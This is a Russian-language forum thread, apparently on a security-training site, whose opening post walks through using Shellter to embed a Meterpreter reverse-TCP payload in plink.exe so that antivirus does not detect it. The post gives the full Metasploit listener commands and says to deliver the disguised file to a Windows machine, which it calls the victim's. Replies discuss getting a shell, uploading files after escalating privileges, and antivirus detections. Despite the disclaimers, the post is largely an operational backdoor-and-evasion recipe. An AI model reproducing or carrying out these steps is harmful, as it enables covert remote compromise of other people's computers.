• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Как обходить антивирусов при тестировании на проникновение в систему

  • Автор темы Adil Adilzade
  • Дата начала
A

Adil Adilzade

Сегодня речь пойдет об очень редком материале в интернете, о программе называемой как Шэллтер (Shellter). Принцип работы софта очень прост - программа берет exe файл из Windows и чудным способом преобразует его так чтобы он "не палился" антивирусом (для удаленного доступа к жертве). Автоматический мод программы позволяет пользователю указать лишь нужные параметры, об остальном она позаботится сама.

Я думаю столько информации хватит давайте приступим к делу.

(Сразу оговариваюсь, что я не несу ответственность за нанесенный вред вашему или другому компьютеру. Это все проводится в ознакомительных целях.)

cropped-Shellter_new_logo_big.png


1) Скачайте и установите программу

2) Разархивируйте и перенесите в раздел 'root/Desktop'.

3) Перенесите “plink.exe” из ‘usr/share/windows-binaries’ и скопируйте его в папку с Shellter, т.е сюда ‘/root/Desktop/shellter’.

4) Чтобы начать использовать пишите в терминале “wine shellter.exe” (без кавычек)

5) Нажмите “A” для переключения на автоматический режим.

6) В следующем напишите “plink.exe”, который мы скопировали в директорию с Шэллтэром.

7) EnableStealthMode? Здесь нажмите “Y”. Это позволит программе сохранить exe файл без лишнего кода т.е оригинал.

8) Когда программа спрашивает вас выбрать Payload нажмите сперва на L потом выберите 1 для Meterpreter_Reverse_TCP. Если выберите 'С' то программа выберет наугад.

9) Дальше вы должны написать ваш локальный ip адрес с которой "проводите тестирование на проникновение".

10) Напишите порт (я написал 4545)
Нажмите на энтэр
Здесь Шэллтэт преобразует код для вас.

После завершения работы вы увидите свой ‘plink.exe’ (замаскированный файл) и ‘plink.exe.bak’ (originalfile) в директории Shellter.

Вот и все мы закончили свое дело с Шэллтэром. А теперь давайте вдобавок покажу вам как протестировать этот файл.

11) Мы должны создать "Сервер прослушивания" для этого в терминале пишем:

start Metasploit (‘msfconsole’ на терминале)

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.39 (Это в моем случае,вы можете проверить свой айпи адрес командой "ifconfig")

set lport 4545

exploit

12) Скопируйте (отправьте, дайте ссылку для скачивания и т.д) свой ‘plink.exe’ на Виндовс.

Теперь если вы запустите свой файл на Виндовс, то вы увидите всего лишь справочный документ на терминале. Т.е мы получили доступ к компьютеру но не полноценно. Но если же мы хотели взять контроль над другой машиной мы написали бы.....

plink 192.168.1.136

(Но не делаем потому что это противозаконно!)

Все это перечисленное было на терминале Шэллтэра

На терминале Метасплоита. (Снова оговариваюсь что это проводилось всего лишь в ознакомительных целях)

Мы можем получить информацию о Виндовс набрав “sysinfo”. Т.е в метасплоите мы получили доступ к командной строке Виндовс

Вот и все что я хотел показать вам. Надеюсь администратор увидит мой пост и отблагодарит книгой ! :) Всего хорошего..
 
  • Нравится
Реакции: id2746 и loggy

Сергей Попов

Кодебай
30.12.2015
4 691
6 584
BIT
291
Уважаемый Adil Adilzade, пожалуйста зарегистрируйтесь на форуме с того же IP, с которого написали это краткое руководство ☺
 
A

Adil

Уважаемый Adil Adilzade, пожалуйста зарегистрируйтесь на форуме с того же IP, с которого написали это краткое руководство ☺
Здравствуйте. Регистрацию прошел но не знаю с того ли айпи или нет )) честное слово это я ))
 
  • Нравится
Реакции: DH2
N

Necromancer

Спасибо за хорошую статью. В целом программа полезная, шелл получить удалось. Пока еще не разобрался как подключать собственные эксплойты. (Находил где то статью на английском, но в большинство файлов эксплойт так засунуть и не удалось). Так же под вопросом доставка файла с эксплойтом и его удаленный запуск. (если отбросить соц.инж.)

+ еще вопрос, не совсем по теме (скорее относится к функционалу meterpreter) - в правах поднялся, доступ к реестур и файловой системе есть, но вот свои файлы загрузить удаленно через upload %path% не выходит. Читать и удалять файлы могу. Директории создаются корректно, а вот создать свой файл либо запихнуть готовый не выходит. (ошибка access denied) .Может что посоветуете?
 
D

di3mus

EnableStealthMode? Здесь нажмите “Y”. Это позволит программе сохранить exe файл без лишнего кода т.е оригинал
Насколько знаю stealthmode служит для внедрения нескольких нагрузок (http-reverse, tcp-reverse и т.д) в одном исполняемом файле.
 
V

vanessa

детект авира, есет и касперский
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!